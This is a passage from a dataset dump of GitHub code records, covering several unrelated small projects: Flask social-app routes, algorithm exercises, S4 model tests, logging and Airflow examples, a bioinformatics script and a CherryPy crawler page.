')\n\treturn redirect(url_for('index'))\n\n@app.route('/<username>')\n@login_required\ndef user(username):\n\tform = EmptyForm()\n\tuser = User.query.filter_by(username=username).first_or_404()\n\tposts = user.posts\n\t\n\tnum_followers = len(user.followers.all())\n\tnum_following = len(user.following.all())\n\tnum_posts = len(user.posts.all())\n\n\tfollowers = user.followers.all()\n\tfollowing = user.following.all()\n\t\n\treturn render_template('user.html', user=user, posts=user.posts, form=form, \n\t\tnum_followers=num_followers, num_following=num_following, num_posts=num_posts,\n\t\tfollowers=followers, following=following)\n\n@app.route('/edit_profile', methods=[\"GET\",\"POST\"])\n@login_required\ndef edit_profile():\n\tuser = User.query.filter_by(username=current_user.username).first_or_404()\n\tform = EditProfile()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=current_user.username).first()\n\t\tif form.username.data != \"\":\n\t\t\tuser.username = form.username.data\n\t\tif form.email.data != \"\":\n\t\t\tuser.email = form.email.data\n\t\tif form.firstname.data != \"\":\n\t\t\tuser.firstname = form.firstname.data\n\t\tif form.lastname.data != \"\":\n\t\t\tuser.lastname = form.lastname.data\n\t\tif form.website.data != \"\":\n\t\t\tuser.website = form.website.data\n\t\tif form.bio.data != \"\":\n\t\t\tuser.bio = form.bio.data\n\t\tdb.session.commit()\n\t\tflash('Profile Successfully Updated!')\n\t\treturn redirect(url_for('user', username=current_user.username))\n\telif request.method == \"GET\":\n\t\tform.email.data = current_user.email \n\t\tform.firstname.data = current_user.firstname\n\t\tform.lastname.data = current_user.lastname\n\t\tform.website.data = current_user.website\n\t\tform.bio.data = current_user.bio\n\treturn render_template('edit_profile.html', title='Edit Profile', form=form)\n\n@app.route('/avatar_upload', methods=['POST'])\n@login_required\ndef avatar_upload():\n\tdef allowed_file(filename):\n\t\treturn '.' in filename and \\\n\t\t\tfilename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\t\n\tbasedir = os.path.abspath(os.path.dirname(__file__))\n\t\n\t# check if the post request has the file part\n\tif 'file' not in request.files:\n\t\tflash('No file part')\n\t\treturn redirect(url_for('user', username=current_user.username))\n\tfile = request.files['file']\n\t\n\t# If the user does not select a file, the browser submits an\n\t# empty file without a filename.\n\tif file.filename == '':\n\t\tflash('No selected file')\n\t\treturn redirect(url_for('user', username=current_user.username))\n\t\n\t# Upload file to static\n\tif file and allowed_file(file.filename):\n\t\tfilename = secure_filename(file.filename)\n\t\tfile.save(os.path.join(basedir + app.config['AVATAR_UPLOAD_FOLDER']) + filename)\n\n\t\t# Update the user's avatar in the db\n\t\timage_url = app.config['AVATAR_UPLOAD_FOLDER'] + filename\n\t\tcurrent_user.avatar_url = image_url\n\t\tdb.session.add(current_user)\n\t\tdb.session.commit()\n\t\t\n\t\tflash('Your profile photo has been updated!' 
)\n\t\treturn redirect(url_for('user', username=current_user.username))\n\t\n\telse:\n\t\tflash('There was a problem with your upload - please try again')\n\t\treturn redirect(url_for('index'))\n\n@app.route('/delete_avatar', methods=[\"POST\"])\n@login_required\ndef delete_avatar():\n\tflash('Your profile photo has been deleted!')\n\tdefault_avatar_url = app.config['DEFAULT_AVATAR_URL']\n\t# TODO delete old avatar\n\tcurrent_user.avatar_url = default_avatar_url\n\tdb.session.add(current_user)\n\tdb.session.commit()\n\treturn redirect(url_for('user', username=current_user.username))\n\n@app.route('/follow/<username>', methods=['POST'])\n@login_required\ndef follow(username):\n\tform = EmptyForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=username).first()\n\t\tif user is None:\n\t\t\tflash('User {} not found.'.format(username))\n\t\t\treturn redirect(url_for('index'))\n\t\tif user == current_user:\n\t\t\tflash('You cannot follow yourself!')\n\t\t\treturn redirect(url_for('user', username=username))\n\t\tcurrent_user.follow(user)\n\t\tdb.session.commit()\n\t\tflash('You are following {}!'.format(username))\n\t\treturn redirect(url_for('user', username=user.username))\n\telse:\n\t\treturn redirect(url_for('index'))\n\n@app.route('/unfollow/<username>', methods=['POST'])\n@login_required\ndef unfollow(username):\n\tform = EmptyForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=username).first()\n\t\tif user is None:\n\t\t\tflash('User {} not found.'.format(username))\n\t\t\treturn redirect(url_for('index'))\n\t\tif user == current_user:\n\t\t\tflash('You cannot unfollow yourself!')\n\t\t\treturn redirect(url_for('user', username=username))\n\t\tcurrent_user.unfollow(user)\n\t\tdb.session.commit()\n\t\tflash('You are not following {}.'.format(username))\n\t\treturn redirect(url_for('user', username=user.username))\n\telse:\n\t\treturn redirect(url_for('index'))\n\n\n@app.route('/delete_post', methods=[\"POST\"])\n@login_required\ndef delete_post():\n\t# TODO\n\tprint(\"Post ID: {}\".format(request.form[\"post_id\"]))\n\tpost_id = request.form['post_id']\n\t# TODO this will need much more work\n\tpost = Post.query.filter_by(id=post_id).first()\n\t#print(\"Post: {}\".format(post))\n\tdb.session.delete(post)\n\tdb.session.commit()\n\tflash('Post successfully deleted! 
')\n\treturn redirect(url_for('index'))\n\n\n@app.route('/messages')\n@login_required\ndef messages():\n\treturn render_template('messages.html')","repo_name":"chnihy/instaclone","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14627390540","text":"# Definition for singly-linked list.\r\nclass ListNode(object):\r\n def __init__(self, x):\r\n self.val = x\r\n self.next = None\r\n\r\nclass Solution(object):\r\n def hasCycle(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: bool\r\n \"\"\"\r\n if head == None: return False\r\n slow, fast = head, head\r\n while fast.next != None and fast.next.next != None:\r\n slow = slow.next\r\n fast = fast.next.next\r\n if slow is fast: return True\r\n\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n n3 = ListNode(3)\r\n n2 = ListNode(2)\r\n n0 = ListNode(0)\r\n n_4 = ListNode(-4)\r\n\r\n n3.next = n2\r\n n2.next = n0\r\n n0.next = n_4\r\n n_4.next = n2\r\n\r\n s = Solution()\r\n print(s.hasCycle(n3))\r\n","repo_name":"vikrant1998/Python-World","sub_path":"Linkedlist/HasCycle.py","file_name":"HasCycle.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5192158911","text":"import jax\nimport jax.numpy as np\nfrom jax.numpy.linalg import eig, inv, matrix_power\nimport s4\n\n\ndef test_ssm():\n N = 4\n L = 8\n I = np.eye(4)\n rng = jax.random.PRNGKey(0)\n # s = s4.S4(L, 2)\n A = s4.make_HiPPO(N)\n B = jax.random.uniform(rng, (N, 1))\n C = jax.random.uniform(rng, (1, N))\n\n ssm = s4.discretize(A, B, C, 1.0 / L)\n out = s4.K_conv(*ssm, L)\n\n out2 = s4.K_gen_simple(*ssm, L=L)\n out2 = s4.convFromGen(out2, L)\n assert np.allclose(out, out2, atol=1e-2, rtol=1e-2)\n\n out3 = s4.K_gen_inverse(*ssm, L=L)\n out3 = s4.convFromGen(out3, L)\n assert np.allclose(out2, out3, atol=1e-2, rtol=1e-2)\n\n u = jax.random.uniform(rng, (L,))\n y2 = s4.scanSSM(\n s4.stepSSM(*ssm), u[:, np.newaxis], np.zeros((ssm[0].shape[0],))\n ).ravel()\n y3 = s4.nonCircularConvolution(u, out)\n assert np.allclose(y2, y3, atol=1e-2, rtol=1e-2)\n\n\ndef test_s4():\n N = 4\n L = 8\n I = np.eye(4)\n\n A2, gamma, p, q, V = s4.make_DPLR_HiPPO(N)\n Vc = V.conj().T\n A = np.diag(gamma) - p[:, np.newaxis] * q[np.newaxis, :].conj()\n A3 = (\n V\n @ (\n np.diag(gamma)\n - (Vc @ p[:, np.newaxis]) @ (Vc @ q[:, np.newaxis].conj()).conj().T\n )\n @ Vc\n )\n A4 = V @ np.diag(gamma) @ Vc - (p[:, np.newaxis] @ q[np.newaxis, :])\n assert np.allclose(A2, A3, atol=1e-2, rtol=1e-2)\n assert np.allclose(A2, A4, atol=1e-2, rtol=1e-2)\n\n rng = jax.random.PRNGKey(0)\n B = jax.random.uniform(rng, (N, 1))\n C = jax.random.uniform(rng, (1, N))\n\n step = 1.0 / L\n ssm = s4.discretize(A, B, C, step)\n\n Abar, _, Cbar = ssm\n Ct = (I - matrix_power(Abar, L)).conj().T @ Cbar.ravel()\n\n out2 = s4.K_gen_simple(*ssm, L=L)\n out2 = s4.convFromGen(out2, L)\n\n K_gen = s4.K_gen_DPLR(gamma, p, q, B, Ct, step)\n out4 = s4.convFromGen(K_gen, L)\n assert np.allclose(out2, out4, atol=1e-2, rtol=1e-2)\n\n # out4 = s.K_gen()\n # out4 = s4.convFromGen(out4, L)\n\n # assert np.allclose(out2, out4, atol=1e-2, rtol=1e-2)\n","repo_name":"srush/annotated-s4","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"66"} 
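The `hasCycle` record above (`vikrant1998/Python-World`) implements Floyd's tortoise-and-hare cycle detection: a slow pointer advances one node per step, a fast pointer two, and the two can only meet if the list loops back on itself. A common extension also reports where the cycle begins: after the pointers meet, restart one of them at the head and step both one node at a time; they meet again exactly at the cycle's entry. Below is a minimal, self-contained sketch of that extension — the name `cycle_start` and the test wiring are illustrative, not part of the dataset record.

```python
# Sketch of Floyd's algorithm with phase 2 included (illustrative, not from the record).
class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None

def cycle_start(head):
    """Return the first node of the cycle, or None if the list is acyclic."""
    slow = fast = head
    # Phase 1: pointers at speeds 1 and 2 meet somewhere inside the cycle.
    while fast is not None and fast.next is not None:
        slow = slow.next
        fast = fast.next.next
        if slow is fast:
            break
    else:
        return None  # fast fell off the end, so there is no cycle
    # Phase 2: the head and the meeting point are equidistant (modulo the
    # cycle length) from the entry, so single-stepping both meets at the entry.
    slow = head
    while slow is not fast:
        slow = slow.next
        fast = fast.next
    return slow

if __name__ == "__main__":
    n3, n2, n0, n_4 = ListNode(3), ListNode(2), ListNode(0), ListNode(-4)
    n3.next, n2.next, n0.next, n_4.next = n2, n0, n_4, n2  # 3 -> 2 -> 0 -> -4 -> 2 ...
    print(cycle_start(n3).val)  # 2
```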
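The `annotated-s4` test record above cross-checks three ways of producing the same convolution kernel (`K_conv`, `K_gen_simple` via `convFromGen`, and the DPLR generating function). The identity being exercised is the standard unrolling of a discrete state-space model into a convolution; it is stated here for reference, with the notation ours rather than the repository's:

```latex
% Discrete SSM with state x_k, input u_k, output y_k, and x_{-1} = 0:
%   x_k = \bar{A} x_{k-1} + \bar{B} u_k, \qquad y_k = \bar{C} x_k
% Unrolling the recurrence gives y = \bar{K} * u with the length-L kernel
\bar{K} = \bigl(\bar{C}\bar{B},\; \bar{C}\bar{A}\bar{B},\; \dots,\; \bar{C}\bar{A}^{L-1}\bar{B}\bigr)
```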
+{"seq_id":"40160778936","text":"import argparse\n\nfrom Client import Client\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--bank_port\", type=int, required=True)\n args = parser.parse_args()\n\n Client(args.bank_port).launch()\n\n\n\n\n\n","repo_name":"kowalikg/Rozprochy","sub_path":"GRPC_Thrift/client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29558711673","text":"def grades(grade):\n \"\"\"This function gives output on student grades\"\"\"\n result = None\n if grade >= 2 and grade < 3:\n result = \"Fail\"\n elif grade < 3.50:\n result = \"Poor\"\n elif grade < 4.50:\n result = \"Good\"\n elif grade < 5.50:\n result = \"Very Good\"\n else:\n result = \"Excellent\"\n\n return result\n\n\nscore = float(input())\nprint(grades(score))","repo_name":"DiyanMarkov/SoftUni-Software-Engineering","sub_path":"Python/Fundamentals/Functions/grades.py","file_name":"grades.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15694066932","text":"from loguru import logger\n\nlogger.debug('This is debug information')\nlogger.info('This is info information')\nlogger.warning('This is warn information')\nlogger.error('This is error information')\n\nlogger.add(\"./test1.log\", rotation=\"1000KB\", encoding=\"utf-8\", enqueue=True, retention=\"10 days\", level='INFO')\nlogger.info('This is info information')\n\n# f-string\nlogger.info('If you are using Python {version}, prefer {feature} of course!', version='3.10', feature='loguru')\n\n\n# 只輸出到文本,不在 console 輸出\n# 清除之前的設置\nlogger.remove(handler_id=None) \n\ntrace= logger.add('test2.log')\n\nlogger.error('This is error information')\nlogger.warning('This is warn information')\n\n# compression 配置日誌壓縮格式\ntrace = logger.add('zip.log', compression='zip')\nlogger.warning('This is warn information')\n\n# 只存 error log\ndef error_only(record):\n \"\"\"\n error 日誌 判斷 \n Args:\n record: \n\n Returns: 若日誌級別爲ERROR, 輸出TRUE\n\n \"\"\"\n return record[\"level\"].name == \"ERROR\"\n\n# ERROR以外級別日誌被過濾掉\nlogger.add(\"error.log\", filter=error_only)\n\nlogger.error('This is error information')\nlogger.warning('This is warn information')\n\n\n\n","repo_name":"EricTsai83/logging","sub_path":"easy_logging_by_using_loguru/easy_logging.py","file_name":"easy_logging.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1039495616","text":"from airflow.decorators import dag, task\nfrom datetime import datetime, timedelta\n\nfrom airflow.operators.bash import BashOperator\n\nfrom src.google_drive_handler import send_image_from_disk, move_file_to_folder, delete_from_google_drive, \\\n download_jpg_file, delete_trash, send_csv_from_disk\n\ndefault_args = {\n 'owner': 'kowal',\n 'retry': 3,\n 'retry_delay': timedelta(minutes=3)\n}\n\n\n@dag(\n dag_id='example_final_dag',\n default_args=default_args,\n catchup=False,\n schedule_interval='37 13 * * *',\n start_date=datetime(2023, 4, 10),\n tags=['google_drive', 'postgres', 'bash']\n)\ndef final_dag():\n @task()\n def send_fiona_image():\n send_image_from_disk(\"pieski/zdjecia_fiony/fiona.jpg\")\n\n @task()\n def send_grzanka_image():\n send_image_from_disk(\"pieski/zdjecia_grzanki/grzanka.jpg\")\n\n @task()\n def send_csv():\n 
send_csv_from_disk(\"csv1/csv1/test_file.csv\")\n\n @task()\n def move_grzanka_image():\n move_file_to_folder(\"pieski/zdjecia_grzanki/grzanka.jpg\", \"pieski/zdjecia_fiony\")\n\n @task()\n def delete_csv():\n delete_from_google_drive(\"csv1/csv1\")\n\n @task()\n def download_fiona_image():\n return download_jpg_file(\"pieski/zdjecia_fiony/fiona.jpg\", \"/downloaded_fiona\")\n\n @task()\n def download_grzanka_image():\n return download_jpg_file(\"pieski/zdjecia_fiony/grzanka.jpg\", \"/downloaded_grzanka\")\n\n @task()\n def delete_trash_from_google_drive():\n delete_trash()\n\n sleep_task = BashOperator(\n task_id='sleep',\n bash_command='sleep 30'\n )\n\n [send_grzanka_image() >> send_fiona_image(), send_csv()] >> sleep_task\n sleep_task >> delete_csv() >> delete_trash_from_google_drive()\n sleep_task >> move_grzanka_image() >> [download_grzanka_image(), download_fiona_image()]\n\n\nfinal_dag()\n","repo_name":"krkowal/AirflowProject","sub_path":"dags/example_final_demo.py","file_name":"example_final_demo.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25900091022","text":"''' “I was driving on the highway the other day and I happened to notice my odometer.\nLike most odometers, it shows six digits, in whole miles only. So, if my car had 300,000\nmiles, for example, I’d see 3-0-0-0-0-0.\n“Now, what I saw that day was very interesting. I noticed that the last 4 digits were\npalindromic; that is, they read the same forward as backward. For example, 5-4-4-5 is a\npalindrome, so my odometer could have read 3-1-5-4-4-5.\n“One mile later, the last 5 numbers were palindromic. For example, it could have read\n3-6-5-4-5-6. One mile after that, the middle 4 out of 6 numbers were palindromic. And\nyou ready for this? 
One mile later, all 6 were palindromic!\n“The question is, what was on the odometer when I first looked?”\nWrite a Python program that tests all the six-digit numbers and prints any numbers that satisfy\nthese requirements.'''\n\n\n\ndef ispal(n,start,end):\n s=str(n)\n s1=s[start:end+1]\n s2=s1[::-1]\n return s1==s2\n\ndef check(n):\n return(ispal(n,2,5) and ispal(n+1,1,5) and ispal(n+2,1,4) and ispal(n+3,0,5))\n\ndef check_all():\n i=100000\n while i<1000000:\n if check(i):\n print(i)\n i=i+1\n\nprint('Possible Solutions are:')\ncheck_all()\n\n'''Possible Solutions are:\n198888\n199999'''\n","repo_name":"sahilrider/Python-Codes","sub_path":"Puzzle1.Py","file_name":"Puzzle1.Py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"66"} +{"seq_id":"21680947142","text":"#!/usr/bin/env python\n\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser(\"TaxFastaConsensus identifies and removes sequences which don't have taxonomic lineages and lineages which don't have corresponding sequences\")\nparser.add_argument('-it', '--InTax', required = True, help = \"\\nInput taxnomic lineages (tab-delimited)\\n\")\nparser.add_argument('-if', '--InFasta', required = True, help = \"\\nInput sequences in fasta format\\n\")\nparser.add_argument('-ot', '--OutTax', required = True, help = \"\\nFilename for output taxonomic lineages\\n\")\nparser.add_argument('-of', '--OutFasta', required = True, help = \"\\nFilename for output fasta formatted sequences\\n\")\nargs = parser.parse_args()\n\nInTax = {}\nwith open(args.InTax, 'r') as InputTax:\n\tfor line in InputTax:\n\t\tInTax[line.strip().split('\\t')[0]] = line.strip().split('\\t')[1]\n\nInFasta = {}\nwith open(args.InFasta, 'r') as InputFasta:\n\tfor line in InputFasta:\n\t\tif not line.strip():\n\t\t\tcontinue\n\t\tif line.startswith('>'):\n\t\t\tif str(line.strip())[1:] not in InFasta:\n\t\t\t\theader = str(line.strip())[1:]\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tsys.stderr.write('\\n# WARNING: TaxFastCons: duplicate sequence header skipped - ' + str(line.strip())[1:])\n\t\tInFasta[header] = line.strip()\n\nOutTax = {}\nfor key in InTax:\n\tif key in InFasta:\n\t\tOutTax[key] = InTax[key]\n\nOutFasta = {}\nfor key in InFasta:\n\tif key in InTax:\n\t\tOutFasta[key] = InFasta[key]\n\nwith open(args.OutTax, 'w') as OutputTax:\n\tfor key in OutTax:\n\t\tOutputTax.write(key + '\\t' + OutTax[key] + '\\n')\n\nwith open(args.OutFasta, 'w') as OutputFasta:\n\tfor key in OutFasta:\n\t\tOutputFasta.write('>' + key + '\\n' + OutFasta[key] + '\\n')\n","repo_name":"RTRichar/MetaCurator","sub_path":"TaxFastaConsensus.py","file_name":"TaxFastaConsensus.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"8658576303","text":"BUTTONS=(\n \"LEFT\",\n \"RIGHT\",\n \"UP\",\n \"DOWN\",\n \"RED\",\n \"GREEN\",\n \"YELLOW\",\n \"BLUE\",\n \"CHANNELUP\",\n \"CHANNELDOWN\",\n \"VOLUMEUP\",\n \"VOLUMEDOWN\",\n \"PLAY\",\n \"PAUSE\",\n \"STOP\",\n \"REWIND\",\n \"FASTFORWARD\",\n \"ASTERISK\",\n \"BACK\",\n \"EXIT\",\n \"ENTER\",\n \"AMAZON\",\n \"NETFLIX\",\n \"3D_MODE\",\n \"AD\", # Audio Description toggle\n \"ADVANCE_SETTING\",\n \"ALEXA\", # Amazon Alexa\n \"AMAZON\", # Amazon Prime Video app\n \"ASPECT_RATIO\", # Quick Settings Menu - Aspect Ratio\n \"CC\", # Closed Captions\n \"DASH\", # Live TV\n \"EMANUAL\", # User Guide\n \"EZPIC\", # Pictore mode preset panel\n \"EZ_ADJUST\", # 
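The `Puzzle1.Py` record above prints 198888 and 199999 as the odometer readings. Both can be spot-checked with the record's own index convention (`ispal(n, start, end)` tests `str(n)[start:end+1]`); the assertions below are an illustrative check, not part of the dataset.

```python
# Illustrative spot-check of the Puzzle1.Py record's printed answers.
def ispal(n, start, end):
    s = str(n)[start:end + 1]
    return s == s[::-1]

for odo in (198888, 199999):
    assert ispal(odo, 2, 5)      # last four digits palindromic (e.g. 8888)
    assert ispal(odo + 1, 1, 5)  # one mile later: last five (e.g. 98889)
    assert ispal(odo + 2, 1, 4)  # next mile: middle four of six (e.g. 9889)
    assert ispal(odo + 3, 0, 5)  # next mile: all six (e.g. 198891)
print("both readings check out")
```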
EzAdjust Service Menu\n \"EYE_Q\", # Energy saving panel\n \"GUIDE\",\n \"HCEC\", # SIMPLINK toggle\n \"HOME\", # Home Dashboard\n \"INFO\", # Info button\n \"IN_START\", # InStart Service Menu\n \"INPUT_HUB\", # Home Dashboard\n \"IVI\",\n \"LIST\", # Live TV\n \"LIVE_ZOOM\", # Live Zoom\n \"MAGNIFIER_ZOOM\", # Focus Zoom\n \"MENU\", # Quick Settings Menu\n \"MUTE\",\n \"MYAPPS\", # Home Dashboard\n \"NETFLIX\", # Netflix app\n \"POWER\", # Power button\n \"PROGRAM\", # TV Guide\n \"QMENU\", # Quick Settings Menu\n \"RECENT\", # Home Dashboard - Recent Apps or last app\n \"RECLIST\", # Recording list\n \"RECORD\",\n \"SAP\", # Multi Audio Setting\n \"SCREEN_REMOTE\", # More Actions panel\n \"SEARCH\",\n \"SOCCER\", # Sport preset\n \"TELETEXT\",\n \"TEXTOPTION\",\n \"TIMER\", # Sleep Timer panel\n \"TV\",\n \"TWIN\", # Twin View\n \"UPDOWN\", # Always Ready app\n \"USP\", # Movie, TVshow, app list\n \"YANDEX\",\n \"0\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n \"5\",\n \"6\",\n \"7\",\n \"8\",\n \"9\"\n)\n","repo_name":"chros73/bscpylgtv","sub_path":"bscpylgtv/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"66"} +{"seq_id":"37137544504","text":"from Stack_and_Queue.stack_and_queue import Queue\nfrom trees.trees import BinaryTree, TNode\n\n\ndef breadth_first(root):\n if not isinstance(root, TNode):\n raise Exception\n queue = Queue()\n queue.enqueue(root)\n arr = []\n while not queue.is_empty():\n front = queue.dequeue()\n arr.append(front.value)\n if front.left:\n queue.enqueue(front.left)\n if front.right:\n queue.enqueue(front.right)\n return arr\n\n\nif __name__ == \"__main__\":\n tree = BinaryTree()\n tree.root = TNode(2)\n tree.root.left = TNode(7)\n tree.root.right = TNode(5)\n tree.root.left.left = TNode(2)\n tree.root.left.right = TNode(6)\n tree.root.right.left = TNode(9)\n tree.root.right.left.left = TNode(4)\n print(breadth_first(tree.root))\n","repo_name":"Ahmad-Khaled-Zaid/data-structures-and-algorithms-python","sub_path":"tree_breadth_first/tree_breadth_first.py","file_name":"tree_breadth_first.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39230006800","text":"from io import StringIO\nimport sys, os\nimport cadabra2\n\nfrom cadabra2_jupyter import SITE_PATH\n\n# super important\n__cdbkernel__ = cadabra2.__cdbkernel__\n\n#  setup stdout, stderr hook\nclass _StdCatch:\n def __init__(self, kernel):\n self._kernel = kernel\n\n def __enter__(self):\n sys.stdout = self.stdout = StringIO()\n sys.stderr = self.stderr = StringIO()\n\n def __exit__(self, exc_type, exc_val, exc_traceback):\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n\n for line in self.stdout.getvalue().splitlines():\n # insert missing newline\n self._kernel._send_code(line + \"\\n\")\n\n # ignore exc_type reporting, since it always gives 'JSON serializable'\n # error, echoing the same message as provided by the __stderr__ catch\n for line in self.stderr.getvalue().splitlines():\n # insert missing newline\n self._kernel._send_error(line + \"\\n\")\n\n\nclass SandboxContext:\n def __init__(self, kernel):\n self._sandbox = {\n \"server\": kernel._cdb_server,\n \"__cdbkernel__\": cadabra2.__cdbkernel__,\n }\n with open(os.path.join(SITE_PATH, \"cadabra2_defaults.py\")) as f:\n code = compile(f.read(), \"cadabra2_defaults.py\", \"exec\")\n exec(code, self._sandbox)\n\n 
self._kernel = kernel\n self._context = _StdCatch(kernel)\n\n def __call__(self, code):\n # redefine, as is catastrophic if accidentally overwritten\n self._sandbox[\"server\"] = self._kernel._cdb_server\n with self._context:\n exec(code, self._sandbox)\n\n @property\n def namespace(self):\n return self._sandbox.keys()\n","repo_name":"kpeeters/cadabra2","sub_path":"jupyterkernel/cadabra2_jupyter/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"66"} +{"seq_id":"41650848092","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('modeling', '0005_auto_20150608_1502'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='scenario',\n name='inputs',\n field=models.TextField(help_text='Serialized JSON representation of scenario inputs', null=True),\n ),\n migrations.AlterField(\n model_name='scenario',\n name='modifications',\n field=models.TextField(help_text='Serialized JSON representation of scenarios modifications ', null=True),\n ),\n ]\n","repo_name":"project-icp/bee-pollinator-app","sub_path":"src/icp/apps/modeling/migrations/0006_auto_20150630_1320.py","file_name":"0006_auto_20150630_1320.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"39147846133","text":"# -*- coding: latin1 -*- \nimport cherrypy\nfrom bs4 import BeautifulSoup\nfrom time import strftime\nfrom shutil import rmtree\nfrom urllib.parse import unquote\nimport urllib.request\nimport webbrowser\nimport os\nimport sys\n \nclass WelcomePage:\n\n\t#pagina inicial\n\tdef index(self):\n\t\tarq = open('c:/py/pi4/index.html', 'r', encoding='latin1')\n\t\ttela = arq.read()\n\t\ttela = tela.encode('latin-1').decode('utf-8')\n\t\tarq.close()\n\t\treturn tela\n\tindex.exposed = True\n\t\n\t#pagina de \"carregando\"\n\tdef carregando(self, hdnValidacao=None, txtPesquisa=None, btnPesquisar=None):\n\t\tarq = open('c:/py/pi4/carregando.html', 'r', encoding='latin1')\n\t\ttela = arq.read()\n\t\ttela = tela.encode('latin-1').decode('utf-8')\n\t\ttela = tela.replace('::site::', str(txtPesquisa))\n\t\tarq.close()\n\t\treturn tela\n\tcarregando.exposed = True\n \n\t#pagina de resultado\n\tdef resultado(self, hdnTxtSite=None, hdnTxtInicio=None, hdnTxtFim=None, hdnTxtTipoCategorizacao=None, hdnTxtCategoria=None, hdnTxtLinksInternos=None, hdnTxtLinksExternos=None, hdnDiretorio=None, hdnTxtCaminhoImagens=None, hdnTxtCaminhoArquivos=None, hdnTxtPalavras=None):\n\t\t# Organiza em ordem alfabetica e retira links duplicados\n\t\tdef trataArray(seq):\n\t\t\tseq.sort()\n\t\t\tnoDupes = []\n\t\t\t[noDupes.append(i) for i in seq if not noDupes.count(i)]\n\t\t\treturn noDupes\n\t\t\n\t\tarq = open('c:/py/pi4/resultado.html', 'r', encoding='latin1')\n\t\ttela = arq.read()\n\t\t\n\t\t# ------- LINKS INTERNOS -------\n\t\thdnTxtLinksInternos = unquote(hdnTxtLinksInternos)\n\t\taux_links_internos_categorias = []\n\t\tlinks_internos_categorias = \"\"\n\t\tlinks_internos = \"\"\n\t\tlinks = hdnTxtLinksInternos.split('<##>')\n\t\t\n\t\tfor contador in range(len(links)-1):\n\t\t\tlink = links[contador].split(\"<#>\")\n\t\t\tif link[1] == \"\":\n\t\t\t\tlink[1] = \"Não Classificado\"\n\t\t\taux_links_internos_categorias.append(link[1])\n\t\t\tlinks_internos = links_internos + 
''\n\t\t\n\t\taux_links_internos_categorias = trataArray(aux_links_internos_categorias)\n\t\tfor contador in range(len(aux_links_internos_categorias)):\n\t\t\tif aux_links_internos_categorias[contador].replace(\" \", \"_\") == \"\":\n\t\t\t\taux_links_internos_categorias[contador] = \"Não classificado\"\n\t\t\tlinks_internos_categorias = links_internos_categorias + '
        ' + aux_links_internos_categorias[contador] + '
        '\n\t\t\tif contador == len(aux_links_internos_categorias) - 1:\n\t\t\t\tbreak;\n\t\t# ------------------------------\n\t\t# ------- LINKS EXTERNOS -------\n\t\thdnTxtLinksExternos = unquote(hdnTxtLinksExternos)\n\t\taux_links_externos_categorias = []\n\t\tlinks_externos_categorias = \"\"\n\t\tlinks_externos = \"\"\n\t\tlinks = hdnTxtLinksExternos.split('<##>')\n\t\t\n\t\tfor contador in range(len(links)-1):\n\t\t\tlink = links[contador].split(\"<#>\")\n\t\t\taux_links_externos_categorias.append(link[1])\n\t\t\tlinks_externos = links_externos + ''\n\t\t\n\t\taux_links_externos_categorias = trataArray(aux_links_externos_categorias)\n\t\tfor contador in range(len(aux_links_externos_categorias)):\n\t\t\tif aux_links_externos_categorias[contador].replace(\" \", \"_\") == \"\":\n\t\t\t\taux_links_externos_categorias[contador] = \"Não classificado\"\n\t\t\tlinks_externos_categorias = links_externos_categorias + '
        ' + aux_links_externos_categorias[contador] + '
